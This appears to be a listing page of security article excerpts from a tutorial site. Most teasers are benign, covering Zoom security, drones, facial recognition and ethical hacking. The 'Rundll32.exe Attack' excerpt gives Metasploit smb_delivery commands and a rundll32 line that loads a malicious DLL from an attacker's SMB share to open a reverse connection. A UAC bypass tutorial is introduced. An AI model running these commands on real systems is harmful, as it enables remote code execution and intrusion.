Article Categories
- All Categories
-
Data Structure
-
Networking
-
RDBMS
-
Operating System
-
Java
-
MS Excel
-
iOS
-
HTML
-
CSS
-
Android
-
Python
-
C Programming
-
C++
-
C#
-
MongoDB
-
MySQL
-
Javascript
-
PHP
Safe & Security Articles
Page 86 of 88
Rundll32.exe Attack
Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0
Read MoreHow can management ensure working women’s safety on their premises?
Women in today’s world are taking major positions in different sectors and are performing extraordinarily well in their work roles. The contribution of women is extremely crucial for the inclusive economic development of the country. The principle of Gender Equality is enshrined in our constitution and the feminist movement in the late 1970s strengthened the concept. If we want women to succeed in their work lives, it is important to create a safe atmosphere for a woman to give a holistic contribution. Let's know how:Infrastructure FacilitiesIt is extremely important to keep the infrastructure facilities extremely strong in any workplace. Proper ...
Read MoreHow will drones help improve the security?
Proper security involves all-around surveillance or observation of people, their behavior and actions, immovable property like land and building as well as movable property stationed there. Surveillance is generally conducted with the help of methods that either have limited mobility or are stationary like, CCTV cameras, GPS tracking dependent on satellite connectivity and not helpful in close observation, stake-outs, which are time-consuming, data-based profiling and biometrics and some other methods.Drone Has Turned the TableAll these methods have their own level of advantages and limitations but when it comes to drone technology, the efficiency, and effectiveness of any security operation increase ...
Read MoreHow to Secure ZOOM application
This article poses a common advisory and security measure note for the Zoom users to protect themself from presumptive hacking attempt, as this application is quite vulnerable to breach. Zoom is quite trending and its popularity mysteriously skyrocket in last 3 month in terms of downloads (20 CR) despite having other plethora of amazing video conferencing application. Zoom does not have the End-to-end encryption facility like whatsapp and WebEx and attackers can potentially gain control to the ZOOM without its user’s cognizance by mean of a secret tools called zWarDial.However, I am not going to discuss the usage of this ...
Read MoreDifference between Facial Recognition and Face ID
Facial RecognitionFacial recognition is a technique in which a person is identified using his/her face. The system captures the facial expression details, analyzes and compares with an existing database of known faces to find a match. The face detection process helps to locate people in images and videos.Face IDFace ID is an advanced face recognition technology first unveiled in iPhone X. Face ID is very reliable and advanced biometric technology used in iPhones.The following are some of the important differences between Facial Recognition and Face ID.Sr. No.KeyFacial RecognitionFace ID1DefinitionFacial Recognition is a software application that is capable of verifying a ...
Read MoreWindows UAC protection Bypass
UAC (User account control ) is a windows IS security that enables a user to perform limited number of admin operations. Overall, it prevents normal users from performing specific actions that could pose a security risk to the system by requiring users to have admin-level permission. For security reasons enabling UAC to detect application installations and prompt for elevation to prevent regular user accounts from installing unauthorized software on clients is a best practice within Windows OS environments.In this tutorial, we shall investigate how to elevate the admin-level right from the end of a normal logged-in user by bypassing UAC ...
Read MoreCyber Attack Symptoms
If we think an advance level of anti-virus has been installed on our computer, and we are fully secure as it performs a full system threat infection scan regularly. However, there may be instances where the scan did not detect any threat, or you cannot perform a scan. In these scenarios, we recommend that to notice the aggressive methods or symptoms to detect threats or attack.If it has been noticed an unwarranted presence of PowerShell in the task manager then our computer is definitely under attack.If a connection found to be established on port 4444 or 445 without your cognizance ...
Read MoreDifference between Cyber Security and Information Security
Cyber Security and Information Security both terms are synonymous with each other the difference between the two comes when nature of data which is going to secure. In nutshell Cyber security deals with protecting networks, computers, and data from unauthorized electronic access while Information security deals with protecting information assets regardless of whether the information is in physical or digital format.Data security is all about securing data. But there is difference between data and information. Not every data can be information. Data can be called as information when it is interpreted in a context and given meaning. For example, “14041989″ ...
Read MoreHow Ethical Hacking is Helping IT Security?
While hackers have been causing a lot of pains to enterprises, another community of hackers have also been finding out vulnerabilities in the IT systems, albeit with a different objective. Such hackers, known as ethical hackers, proactively identify IT system vulnerabilities by hacking into the systems. Ethical hackers are a boon to enterprises because they identify potential vulnerabilities without any malicious intent. Enterprises can fix the issues before hackers can exploit them. Ethical hackers are being increasingly recognized – reputed organizations have been paying bounties to ethical hackers to find security loopholes in their systems that are hitherto undetected.Who is ...
Read MoreFireball – The Virus Which Can Hijack Your Browser
Beware of all the internet surfers; the Fireball virus is coming to compromise your security!! Your internet browser is at high risk, as the browser attacking nasty virus can take control of your browser and do whatever it want without your consent. It can even run malicious codes, download files and much more on your own machine without your knowledge.After the dangerous WannaCry Ransomware attack which gave sleepless nights to millions of people worldwide, now another dirty virus called as “Fireball” is on attacking spree to make its victims around the world. As per the latest reports, the Fireball malware ...
Read More